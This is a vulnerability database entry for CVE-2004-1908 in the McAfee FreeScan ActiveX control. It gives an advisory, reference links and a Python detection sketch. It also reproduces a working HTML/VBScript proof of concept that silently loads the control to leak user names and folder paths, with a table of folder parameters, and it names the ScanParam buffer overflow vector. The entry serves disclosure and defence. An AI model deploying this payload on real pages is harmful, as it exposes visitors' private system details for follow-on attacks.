McAfee FreeScan Remote Buffer Overflow and Information Disclosure Vulnerability

Vulnerability ID: 1107851
Vulnerability type: Design error
Published: 2004-04-07
Updated: 2005-10-20
CVE ID: CVE-2004-1908
CNNVD-ID: CNNVD-200412-227
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/23926
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-227
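|Vulnerability details
McAfee FreeScan can detect thousands of viruses and is based on the McAfee VirusScan engine. The COM object that McAfee FreeScan installs and registers does not perform sufficient bounds checking on user-supplied strings. A remote attacker can exploit this to trigger a stack-based buffer overflow, possibly executing arbitrary instructions with the privileges of the user process.

On installation, McAfee FreeScan registers the "McFreeScan.CoMcFreeScan.1" COM object. After FreeScan has been used for the first time, the object can be created locally or remotely, for example:
Set object = CreateObject("McFreeScan.CoMcFreeScan.1")
The "ScanParam" property of this object does not sufficiently check the length of the string it receives. Submitting overly long data can trigger a buffer overflow, allowing a user to execute arbitrary instructions with system privileges.

In addition, a built-in McAfee FreeScan function can return the user's shell folders, such as %Windir% and "My Documents", whose paths contain the user name. This means sensitive system information can be obtained as follows:
msgbox object.GetSpecialFolderLocation(&H0024) - pops up the Windows path
msgbox object.GetSpecialFolderLocation(&H0005) - pops up the user name and the My Documents path
|Exploit (PoC)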
source: http://www.securityfocus.com/bid/10077/info

Reportedly the Mcafee FreeScan 'McFreeScan.CoMcFreeScan.1' COM object is prone to a remote information disclosure vulnerability. This issue is due to a failure of the object to properly validate information access credentials.

Successful exploitation of this issue may provide an attacker with sensitive system information. The provided system information may be used to carry out further attacks against the affected system.

<OBJECT ID="MCFS" WIDTH=0 HEIGHT=0
CLASSID="CLSID:EF791A6B-FC12-4C68-99EF-FB9E207A39E6"></OBJECT>

<script language=vbscript>

sPath = MCFS.GetSpecialFolderLocation(&H0000)

'Gets the path for the desktop folder.

document.write(sPath)

'The Available parameters for the method and their return values:
'
'&H0000=desktop
'&H0002=%username%start menu/programs
'&H0005=%username%/my documents
'&H0006=%username%/favorites
'&H0007=%username%start menu/programs/startup
'&H0008=%username%/recent
'&H0009=%username%/sendto
'&H0010=%username%/desktop
'&H0013=%username%/nethood
'&H0014=%windir%/fonts
'&H0015=%username%/templates
'&H0016=all users/start menu
'&H0017=all users/start menu/programs
'&H0018=all users/start menu/programs/startup
'&H0019=all users/desktop
'&H0020=%username%/Local Settings/Temporary Internet Files
'&H0021=%username%/cookies
'&H0022=%username%/local settings/history
'&H0023=All Users/Application Data
'&H0024=%windir%
'&H0025=%windir%/system32
'&H0026=%programfiles%
'&H0027=%username%/My Documents/My Pictures
'&H0028=%username%
'&H0029=%windir%

</script>
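
A detection-side sketch, added here as an example and not part of the original advisory or PoC: it scans HTML for markup that instantiates the FreeScan control (by the CLSID or ProgID given above) and reports calls to GetSpecialFolderLocation and references to ScanParam on that object. The function name, finding labels and sample page are assumptions made for illustration; only literal numeric arguments are decoded.

```python
import re

# Identifiers taken from the advisory text and PoC on this page.
CLSID = "EF791A6B-FC12-4C68-99EF-FB9E207A39E6"
PROGID = "McFreeScan.CoMcFreeScan.1"
# A few rows of the PoC's parameter table: argument value -> folder returned.
FOLDERS = {0x00: "desktop", 0x05: "%username%/my documents",
           0x21: "%username%/cookies", 0x24: "%windir%", 0x28: "%username%"}

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
ID_ATTR = re.compile(r"\bid\s*=\s*[\"']?([\w-]+)", re.I)
CREATE = re.compile(r'\bset\s+(\w+)\s*=\s*createobject\s*\(\s*"'
                    + re.escape(PROGID) + '"', re.I)
FOLDER_CALL = re.compile(
    r"\b(\w+)\.GetSpecialFolderLocation\s*\(\s*(&H[0-9A-F]+|\d+)", re.I)
SCANPARAM = re.compile(r"\b(\w+)\.ScanParam\b", re.I)

# Constructed sample page (not from the advisory) for a stand-alone run.
SAMPLE = '''<OBJECT ID="MCFS" WIDTH=0 HEIGHT=0
CLASSID="CLSID:EF791A6B-FC12-4C68-99EF-FB9E207A39E6"></OBJECT>
<script language=vbscript>
sPath = MCFS.GetSpecialFolderLocation(&H0024)
Set o = CreateObject("McFreeScan.CoMcFreeScan.1")
o.ScanParam = userInput
</script>'''


def find_freescan_use(html):
    """List (kind, detail) findings for markup that loads the control."""
    names = set()  # script-visible names bound to the control
    for tag in OBJECT_TAG.findall(html):
        ident = ID_ATTR.search(tag)
        if CLSID.lower() in tag.lower() and ident:
            names.add(ident.group(1).lower())
    names.update(m.group(1).lower() for m in CREATE.finditer(html))
    if not names:
        return []
    findings = [("control-instantiated", sorted(names))]
    for m in FOLDER_CALL.finditer(html):
        if m.group(1).lower() in names:  # VBScript names are case-insensitive
            arg = m.group(2)
            value = int(arg[2:], 16) if arg[0] == "&" else int(arg)
            findings.append(("folder-disclosure",
                             FOLDERS.get(value, "folder id 0x%04X" % value)))
    for m in SCANPARAM.finditer(html):
        if m.group(1).lower() in names:
            findings.append(("scanparam-access", m.group(1)))
    return findings
```

Calling `find_freescan_use(SAMPLE)` returns the instantiation finding first, followed by one entry per folder lookup and per ScanParam reference; pages that never load the control return an empty list.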
|References

Source: XF
Name: freescan-mcfscan-info-disclosure(15782)
Link: http://xforce.iss.net/xforce/xfdb/15782
Source: BID
Name: 10077
Link: http://www.securityfocus.com/bid/10077
Source: SECUNIA
Name: 11313
Link: http://secunia.com/advisories/11313
Source: BUGTRAQ
Name: 20040407 McAfee Freescan ActiveX Information Disclosure [Additional Details & PoC]
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108137545531496&w=2
Source: BUGTRAQ
Name: 20040407 Mcafee FreeScan - Remote Buffer Overflow and Private Information Disclosure
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108136872711898&w=2
Source: FULLDISC
Name: 20040407 Symantec, McAfee and Panda ActiveX controls
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/019891.html
Source: FULLDISC
Name: 20040407 Mcafee FreeScan - Remote Buffer Overflow and Private Information Disclosure
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/019877.html
Source: NSFOCUS
Name: 6294
Link: http://www.nsfocus.net/vulndb/6294
